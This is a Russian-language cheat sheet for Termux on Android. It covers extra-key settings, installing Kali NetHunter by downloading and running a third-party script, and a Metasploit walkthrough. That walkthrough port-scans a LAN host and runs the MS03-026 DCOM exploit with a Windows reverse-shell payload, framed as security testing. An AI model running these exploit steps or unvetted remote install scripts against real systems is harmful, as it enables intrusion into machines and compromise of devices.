Ссылки:
1 2 3 4 |
https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0 https://wiki.termux.com/wiki/Kali_Nethunter https://f-droid.org/packages/com.termux/ https://wiki.termux.com/wiki/Main_Page |
Старая доп панель:
vi ~/.termux/termux.properties
1 |
extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']] |
Kali Nethunter
1 2 3 4 5 6 7 8 9 10 11 |
Установка nethunter: pkg install wget wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter chmod +x kalinethunter bash kalinethunter Решение проблем после установки: apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6 wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb apt --fix-broken install dpkg -i ./kali-archive-keyring_2018.1_all.deb |
metasploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
pkg update pkg install unstable-repo pkg install metasploit msfconsole db_status git init ---------- ---------- use auxiliary/scanner/portscan/tcp set PORTS 1-5000 set RHOSTS 192.168.88.161 run search dcom use exploit/windows/dcerpc/ms03_026_dcom set payload windows/shell_reverse_tcp show options set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность) set LHOST 192.168.88.247 - IP злоумышленника run cd ..\..\ echo Hello! > achtung.x msg helo можно вводить любую команду, как в обычном cmd.exe |
Любимые приложения:
1 |
pkg install openssh python golang vim |